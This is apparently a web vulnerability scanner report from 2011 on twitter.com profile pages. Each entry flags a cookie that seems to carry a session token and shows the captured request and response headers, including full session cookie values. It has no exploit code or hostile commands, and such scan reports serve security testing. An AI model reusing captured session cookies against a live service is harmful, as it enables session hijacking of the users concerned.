HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:16:24 GMT Server: hi Status: 200 OK X-Transaction: 1296224184-14398-11076 ETag: "7215ee9c7d9dc229d2921a40e899ec5f" Last-Modified: Fri, 28 Jan 2011 14:16:24 GMT X-Runtime: 0.01356 Content-Type: text/html; charset=utf-8 Content-Length: 1 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296224184721837; path=/; expires=Fri, 04-Feb-11 14:16:24 GMT; domain=.twitter.com Set-Cookie: guest_id=12962241848871382; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTdiYTgzYzg5NjU0NmY1NzY5NjRmYzhiZDczOGFiZTQzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIOWr7zC0B--30505dd0f6c83aaf558b61083089f58bf8eaf3f1; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /AddThis HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:22 GMT Server: hi Status: 200 OK X-Transaction: 1296265282-57668-31881 ETag: "a2ed93258e38abb440f9997e5bc5343f" Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT X-Runtime: 0.00798 Content-Type: text/html; charset=utf-8 Content-Length: 49756 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Applebees HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:53 GMT Server: hi Status: 200 OK X-Transaction: 1296265973-32426-51080 ETag: "6de1ef610ac1e89e0f9514036de3e619" Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT X-Runtime: 0.01745 Content-Type: text/html; charset=utf-8 Content-Length: 51962 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /AshieApple HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:52 GMT Server: hi Status: 200 OK X-Transaction: 1296265972-35369-4983 ETag: "d630e94c0555a4dba001b1cdb5e86f78" Last-Modified: Sat, 29 Jan 2011 01:52:52 GMT X-Runtime: 0.01071 Content-Type: text/html; charset=utf-8 Content-Length: 29081 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Beckett_News HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:57 GMT Server: hi Status: 200 OK X-Transaction: 1296265977-87220-8975 ETag: "04df87e3f545648158c89bbf858582e1" Last-Modified: Sat, 29 Jan 2011 01:52:57 GMT X-Runtime: 0.01098 Content-Type: text/html; charset=utf-8 Content-Length: 40483 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /BosHerald_Edge/ HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:21 GMT Server: hi Status: 200 OK X-Transaction: 1296265281-63986-28033 ETag: "94982feeb68a0a8cb68c04820be2cd8d" Last-Modified: Sat, 29 Jan 2011 01:41:21 GMT X-Runtime: 0.00768 Content-Type: text/html; charset=utf-8 Content-Length: 52761 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ChrisLambton13 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:51:48 GMT Server: hi Status: 200 OK X-Transaction: 1296265908-61244-34588 ETag: "2188d703ab23d0ac8a30be86c7dd57e4" Last-Modified: Sat, 29 Jan 2011 01:51:48 GMT X-Runtime: 0.01239 Content-Type: text/html; charset=utf-8 Content-Length: 50278 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ConanOBrien HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:55 GMT Server: hi Status: 200 OK X-Transaction: 1296265975-23118-1747 ETag: "86f99f7437978cad54926bacf38c847f" Last-Modified: Sat, 29 Jan 2011 01:52:55 GMT X-Runtime: 0.01272 Content-Type: text/html; charset=utf-8 Content-Length: 36266 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /DustinPedroia15 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:40 GMT Server: hi Status: 200 OK X-Transaction: 1296266020-27916-18382 ETag: "e0a2dddf6e04f8631a548ec38cc9be5b" Last-Modified: Sat, 29 Jan 2011 01:53:40 GMT X-Runtime: 0.01575 Content-Type: text/html; charset=utf-8 Content-Length: 29153 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ExpertDan HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:52 GMT Server: hi Status: 200 OK X-Transaction: 1296225052-83422-12297 ETag: "71df0fbad70a67fb009c57f7a62454f1" Last-Modified: Fri, 28 Jan 2011 14:30:52 GMT X-Runtime: 0.01535 Content-Type: text/html; charset=utf-8 Content-Length: 53009 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /GQMagazine HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
